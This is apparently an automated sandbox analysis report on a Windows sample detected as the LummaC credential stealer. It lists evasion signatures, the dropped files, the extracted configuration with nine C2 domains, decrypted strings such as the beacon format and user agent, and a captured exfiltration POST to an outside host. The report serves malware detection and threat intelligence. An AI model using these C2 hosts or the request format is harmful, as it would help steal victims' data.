Edit tour

Windows Analysis Report
3stIhG821a.exe

Overview

General Information

Sample name:	3stIhG821a.exe renamed because original name is a hash value
Original sample name:	b50d06fdc5a763244d12f5d2e7c1ee3c.exe
Analysis ID:	1581228
MD5:	b50d06fdc5a763244d12f5d2e7c1ee3c
SHA1:	3c809781c51c973199894746f7dab09ca9c6a416
SHA256:	80a8fee2e4d5909bf2dbe60be97d7ea44bbc5d9e3745caf83a06653287ea229c
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

3stIhG821a.exe (PID: 5756 cmdline: "C:\Users\user\Desktop\3stIhG821a.exe" MD5: B50D06FDC5A763244D12F5D2E7C1EE3C)

LummaC2.exe (PID: 792 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["manyrestro.lat", "curverpluch.lat", "bashfulacid.lat", "censeractersj.click", "talkynicer.lat", "slipperyloo.lat", "wordyfindy.lat", "tentabatte.lat", "shapestickyr.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.3stIhG821a.exe.570000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 3stIhG821a.exe

Avira: detected

Found malware configuration

Source: 00000001.00000002.2954796616.0000000000F7B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "curverpluch.lat", "bashfulacid.lat", "censeractersj.click", "talkynicer.lat", "slipperyloo.lat", "wordyfindy.lat", "tentabatte.lat", "shapestickyr.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: 3stIhG821a.exe	ReversingLabs: Detection: 55%
Source: 3stIhG821a.exe	Virustotal: Detection: 46%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 3stIhG821a.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: bashfulacid.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: tentabatte.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: curverpluch.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: talkynicer.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: shapestickyr.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: manyrestro.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: slipperyloo.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: wordyfindy.lat
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: censeractersj.click
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Workgroup: -
Source: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Fppr10--Indus2

Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_42fe9426-9

Source: 3stIhG821a.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009FC59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_009FEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	1_2_009FEEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_009D8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_009EC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009E90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	1_2_009E90B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	1_2_009FE8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	1_2_009E10F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	1_2_009FB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_009FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	1_2_009FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	1_2_009FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	1_2_009FF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	1_2_009FF040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	1_2_009EB078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then call dword ptr [00A01DB0h]	1_2_009CD196
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009DD189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_009EC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	1_2_009E59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_009EC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	1_2_009EC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_009FD140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009DD172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	1_2_009E8290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	1_2_009FDAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_009D92C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	1_2_009D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	1_2_009D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	1_2_009E6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	1_2_009C8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	1_2_009D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	1_2_009FDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	1_2_009CD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	1_2_009FBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009FBC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	1_2_009C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	1_2_009C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	1_2_009FB46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	1_2_009DCC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	1_2_009DAD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	1_2_009CEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_009CEDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	1_2_009E9DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	1_2_009F7D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	1_2_009D6D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	1_2_009DD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-00B3ED90h]	1_2_009EB695
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	1_2_009E26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	1_2_009D46C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	1_2_009E66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	1_2_009FBCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	1_2_009E8640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	1_2_009F7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	1_2_009F7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	1_2_009EBF45

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: curverpluch.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 475795Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 35 36 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 34.226.108.155 34.226.108.155

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 475795Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 31 34 35 36 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:52:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
